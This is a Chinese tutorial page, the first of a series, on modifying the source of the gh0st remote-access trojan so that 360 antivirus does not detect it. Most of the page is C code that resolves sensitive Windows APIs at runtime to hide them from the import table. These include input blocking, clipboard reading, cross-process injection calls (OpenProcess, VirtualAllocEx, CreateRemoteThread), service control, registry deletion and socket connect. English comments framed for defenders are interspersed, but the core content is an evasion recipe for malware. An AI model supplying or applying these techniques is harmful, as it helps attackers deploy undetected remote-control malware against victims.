网络安全:gh0st源码免杀360全套(1)

    360安全卫士 v8.0 + 360杀毒 v2.0。过360安全卫士的提示比较复杂，我们在最后一个章节讲这个；这次主要是过360的表面免杀（dll、dat、exe免杀）。需要免杀的函数如下：

 

// Runtime-resolved Win32 imports. Every pointer below is populated with
// LoadLibrary + GetProcAddress instead of a static import, so these API
// names do not appear in the module's import table (the stated goal of the
// page). Notes for defenders: the DLL and function names remain plaintext
// string literals in the image, the LoadLibrary/GetProcAddress pairing is
// itself a detection signal, and the module names appear here in mixed
// case ("Kernel32.dll" / "KERNEL32.dll", "Advapi32.dll" / "ADVAPI32.dll"),
// so string-based rules must match case-insensitively. The *T function
// pointer typedefs used below are not shown on this page.
//
// Service-control APIs (advapi32): control-handler registration and
// status reporting for a Windows service.
RegisterServiceCtrlHandlerAT pRegisterServiceCtrlHandlerA

=(RegisterServiceCtrlHandlerAT)GetProcAddress(LoadLibrary("Advapi32.dll"),"RegisterServiceCtrlHandlerA");

 

SetServiceStatusT pSetServiceStatus

= (SetServiceStatusT)GetProcAddress(LoadLibrary("Advapi32.dll"),"SetServiceStatus");

 

// Process-wide unhandled-exception filter (kernel32).
SetUnhandledExceptionFilterT pSetUnhandledExceptionFilter

=(SetUnhandledExceptionFilterT)GetProcAddress(LoadLibrary("Kernel32.dll"),"SetUnhandledExceptionFilter");

 

// Input, cursor and clipboard APIs (user32).
GetCursorInfoT pGetCursorInfo

= (GetCursorInfoT)GetProcAddress(LoadLibrary("user32.dll"),"GetCursorInfo");

 

BlockInputT pBlockInput

= (BlockInputT)GetProcAddress(LoadLibrary("user32.dll"),"BlockInput");

 

SetCursorPosT pSetCursorPos

= (SetCursorPosT)GetProcAddress(LoadLibrary("user32.dll"),"SetCursorPos");

 

SetCaptureT pSetCapture

= (SetCaptureT)GetProcAddress(LoadLibrary("user32.dll"),"SetCapture");

 

mouse_eventT pmouse_event

= (mouse_eventT)GetProcAddress(LoadLibrary("user32.dll"),"mouse_event");

 

GetClipboardDataT pGetClipboardData

= (GetClipboardDataT)GetProcAddress(LoadLibrary("user32.dll"),"GetClipboardData");

 

// Global-memory size query (kernel32); on this page it sits next to
// GetClipboardData, presumably to size clipboard handles - confirm in caller.
GlobalSizeT pGlobalSize

= (GlobalSizeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GlobalSize");

 

CloseWindowT pCloseWindow

= (CloseWindowT)GetProcAddress(LoadLibrary("user32.dll"),"CloseWindow");

 

// Process and memory APIs (kernel32). OpenProcess, VirtualAllocEx and
// CreateRemoteThread resolved together are the classic cross-process
// injection primitives; EDR/AV heuristics commonly key on exactly this
// trio being obtained dynamically rather than imported.
OpenProcessT pOpenProcess

= (OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"OpenProcess");

 

WideCharToMultiByteT pWideCharToMultiByte

=(WideCharToMultiByteT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WideCharToMultiByte");

 

ExpandEnvironmentStringsAT pExpandEnvironmentStringsA

=(ExpandEnvironmentStringsAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"ExpandEnvironmentStringsA");

 

VirtualAllocExT pVirtualAllocEx

= (VirtualAllocExT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"VirtualAllocEx");

 

CreateRemoteThreadT pCreateRemoteThread

=(CreateRemoteThreadT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateRemoteThread");

 

// Service-manager APIs (advapi32): open, control, delete and close a
// service handle. Service creation/removal through these is a common
// persistence indicator worth logging (e.g. SCM event log entries).
ControlServiceT pControlService

= (ControlServiceT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"ControlService");

 

OpenServiceAT pOpenServiceA

= (OpenServiceAT)GetProcAddress(LoadLibrary("Advapi32.dll"),"OpenServiceA");

 

DeleteServiceT pDeleteService

= (DeleteServiceT)GetProcAddress(LoadLibrary("Advapi32.dll"),"DeleteService");

 

CloseServiceHandleT pCloseServiceHandle

= (CloseServiceHandleT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"CloseServiceHandle");

 

下面几个函数比较难免杀,我就把函数体给写出来

 

// Function-pointer type for shlwapi's SHDeleteKeyA (registry key deletion),
// declared here because the page says this symbol is among the hardest to
// hide from the scanner. Resolved at runtime from SHLWAPI.dll, so the name
// survives only as the string literal below - a usable static-detection hook.
typedef DWORD (STDAPICALLTYPE *SHDeleteKeyAT)(HKEY,LPCTSTR);

SHDeleteKeyAT pSHDeleteKeyA

= (SHDeleteKeyAT)GetProcAddress(LoadLibrary("SHLWAPI.dll"),"SHDeleteKeyA");

 

// Function-pointer type mirroring wininet's InternetReadFile signature
// (handle, output buffer, buffer size, bytes-read out-parameter), with the
// SAL annotations copied from the SDK header. Resolved at runtime from
// Wininet.dll; for defenders, a binary that loads wininet but imports
// nothing from it is itself a notable anomaly.
typedef BOOL (_stdcall *InternetReadFileT)

(

    __in HINTERNET hFile,

    __out_bcount(dwNumberOfBytesToRead) LPVOID lpBuffer,

    __in DWORD dwNumberOfBytesToRead,

    __out LPDWORD lpdwNumberOfBytesRead

);

InternetReadFileT pInternetReadFile

= (InternetReadFileT)GetProcAddress(LoadLibrary("Wininet.dll"),"InternetReadFile");

 

ICDecompressEnd  -> ICSendMessage

// Video-compression-manager entry point (msvfw32). The page replaces the
// ICDecompressEnd/ICCompressGetFormat macros with direct ICSendMessage calls
// so that only this one name has to be resolved; the ICSendMessageT typedef
// is not shown here.
ICSendMessageT pICSendMessage

= (ICSendMessageT)GetProcAddress(LoadLibrary("MSVFW32.dll"),"ICSendMessage");

 

// Before/after pair: the first line is the original ICCompressGetFormat
// macro call, the second is its expansion through the runtime-resolved
// pICSendMessage with ICM_COMPRESS_GET_FORMAT (the vfw.h macro forwards to
// ICSendMessage with the same two pointers cast to DWORD_PTR). Presumably
// only the second line is meant to remain in the built code - confirm.
ICCompressGetFormat(m_hIC, m_lpbmiInput, &m_bmiOutput);

pICSendMessage(m_hIC, ICM_COMPRESS_GET_FORMAT, (DWORD_PTR)(LPVOID)(m_lpbmiInput), (DWORD_PTR)(LPVOID)(&m_bmiOutput));

 

// Case-insensitive string compare, looked up by name at runtime; the
// strcmpiT typedef is not shown on this page.
strcmpiT pstrcmpi

= (strcmpiT)GetProcAddress(LoadLibrary("shlwapi.dll"),"strcmpi");

 

// Winsock name resolution and connect, obtained at runtime from Ws2_32.dll.
// gethostbyname takes a host name and returns a hostent pointer (signature
// copied from winsock2.h); connectT is not shown on this page. For
// defenders this is the outbound-connection path: DNS lookups followed by
// connect() from a process with no static winsock imports is a good
// place to anchor network-behaviour rules.
typedef struct hostent FAR * (WSAAPI *gethostbynameT)

(

 IN const char FAR * name

);

gethostbynameT pgethostbyname

= (gethostbynameT)GetProcAddress(LoadLibrary("Ws2_32.dll"),"gethostbyname");

connectT pconnect

= (connectT)GetProcAddress(LoadLibrary("Ws2_32.dll"),"connect");

 

 

